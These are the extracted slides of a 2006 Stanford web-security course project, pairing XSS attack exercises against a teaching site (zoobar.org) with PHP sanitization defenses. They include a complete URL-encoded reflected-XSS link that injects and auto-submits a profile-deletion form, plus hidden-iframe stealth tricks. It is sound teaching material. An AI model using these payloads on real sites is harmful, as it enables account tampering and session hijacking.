Embed Size (px)
Citation preview
1
Project 2: Web App Security
Collin Jackson
CS 155 Spring 2006
2
Deadlines
3
Part 1
Attacks
4
Overview
• Explore severalattack types
• Requires botheffectiveness and stealth
Learn:• How an attacker can evade sanitization• Consequences of an exploit• JavaScript• Very basic CSS
5
Attack A: Cookie Theft Use URL encoding Could hijack
session
Attack C: Login Snooping Evade sanitization Handle DOM
events
Attacks
Attack B: Silent Transfer Navigate browser Use iframes, forms
Attack D: Profile Worm Confuse site scripts Replicate
zoobar.orglink
emailzoobar.org
formbadguy.com
stanford.eduredirect
badguy.comzoobar.orgform
zoobar.org
6
JavaScript
Browser scripting language with C-like syntaxSandboxed, garbage collectedClosures
var x = 3; var y = function() { alert(x); }; return y;
Encapsulation/objectsfunction X() { this.y = 3; } var z = new X();
alert(z.y);
Can interpret data as code (eval)Browser-dependent
7
Invoking JavaScript
Tags: <script>alert( ‘Hello world!’ )</script>Links: javascript:alert( ‘Hello world!’ ) Wrap code in “void” if it has return value
Event handlers: <form onsubmit=“alert( ‘Hello world!’ )”><iframe onload=“alert( ‘Hello world!’ )”>CSS (IE only)<style>body { background: url(javascript:alert( ‘Hello world!’ ));
}</style>
8
DOM Manipulation Examples
document.getElementByID(id)document.getElementsByTagName(tag)document.write(htmltext)document.createElement(tagname)document.body.appendChild(node)document.forms[index].fieldname.value = …document.formname.fieldname.value = …frame.contentDocument.getElementById(id)
9
Arrays and Loops
Example: Change href of all links on a page
var links = document.getElementsByTagName(‘a’);
for(var i = 0; i < links.length; i++) { var link = links[i]; link.href = “javascript:alert(‘Sorry!’);”;}
10
Other Useful Functions
Navigation document.location document.formname.submit() document.forms[0].submitfield.click()
Delayed Events node.addEventListener(eventname,
handler, useCapture) node.removeEventListener(eventna
me, handler, useCapture) window.setTimeout(handler,
milliseconds)
11
Stealthy Styles
var node = document.getElementByID(“mynodeid”);
node.style.display = ‘none’; // may not load at all
node.style.visibility = ‘hidden’; // still takes up space
node.style.position = ‘absolute’; // not included in flow
document.write( // can also write CSS rules to page“<style>#mynodeid { visibility:hidden; }</style>”);
12
Example: Profile Deleter
Malicious hyperlink deletes profile of user who clicks itOnly works when user logged in User might have multiple tabs open Might have chosen/forgotten not to log
out Might appear in another user’s profile
Uses vulnerability in users.php from Attack AConstructs profile deletion form and submits it
???
13
Find vulnerabilitySite reflectsquery parameter in input field
Link can includeanything wewant here
14
Copy form data
View sourceto find formfields
Create copycat form with ourmodifications
15
Close previous<input>,<form>
Buttonclick triggersform submit
URL encode
16
Debugging
Check error
It didn’t work.Open JavaScriptconsole
Undefined No properties!
Two formswith same name
17
Now withcorrectform
Fixed version
18
Profile deleted
Final Test
users.phpreplacedwith index.php
http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E
19
Post form into hidden iframe <form name=F action=/index.php target=myframe>…<iframe name=myframe style=“visibility:hidden”>…
Open page with form in hidden iframe
<iframe name=myframe style=“visibility:hidden”>…<script>document.myframe.contentDocument.forms[0] .profile_update.value =“”;</script>
Stealthier approaches
20
Part 2
Defenses
21
Goals
Learn:• How easy it is to make mistakes• That even simple code can be hard to secure• Techniques for appropriate input validation• PHP• Very basic SQL
Little programming knowledge can be a dangerous thing
22
PHP: Hypertext Preprocessor
Server scripting language with C-like syntaxCan intermingle static HTML and code
<input value=<?php echo $myvalue; ?>>Encapsulation/objects
class X { var $y = 3; } $z = new X(); echo $z->y;
Can embed variables in double-quote strings$user = “world”; echo “Hello $user!”;
or $user = “world”; echo “Hello” . $user . “!”;
Form data in global arrays $_GET, $_POST, …
23
SQL
Widely used database query languageFetch a set of recordsSELECT * FROM Person WHERE Username=‘grader’
Add data to the tableINSERT INTO Person (Username, Zoobars)
VALUES (‘grader’, 10)
Modify dataUPDATE Person SET Zoobars=42 WHERE PersonID=5
Query syntax (mostly) independent of vendor
24
File structure
index.php users.phptransfer.phplogin.phpincludes/ auth.php (cookie authentication) common.php (includes everything else) navigation.php (site template)
db/ zoobar/
Person.txt (must be writable by web server)Includes /usr/class/cs155/projects/pp2/txt-db-api/…
Only edit these files
25
txt-db-api
Third-party text file database libraryData can be int, string, and autoincrementNeed to escape strings: \’ \” \\Actually magic_quotes_gpc does this for us$recipient = $_POST[‘recipient’]; // already escaped$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executeQuery($sql);if( $rs->next() )
$id = $rs->getCurrentValueByName(‘PersonID’);
26
Attack A: Cookie Theft
Attack C: Login Snooping
Defenses to Part 1
Attack B: Silent Transfer
Attack D: Profile Worm
27
Sanitization Techniques
addslashes(string) Already done by magic_quotes_gpc Inverse: stripslashes(string)htmlspecialchars(string [, quote_style]) Converts & < > ” to HTML entities Use ENT_QUOTES to change ’ to ' strip_tags(string, [, allowable_tags]) Max tag length 1024 Does not sanitize tag propertiespreg_replace(pattern, replacement, subject)More info: http://php.net
28
More XSS hunting
Look for untrusted input used as outputNote sanitization already applied to each variable Form data has magic_quotes_gpc, db data does not
Determine browser context for output Inside a quoted string within a tag – worry about ’ ” Outside a tag – worry about < > Input to eval – very dangerous
Sanitize the output if necessary No penalty for erring on the side of caution But sanitizing multiple times may lead to problems
No credit for solving non-goals: SQL injection, etc.
29
Good luck!
Start earlyAsk questionsBe creative
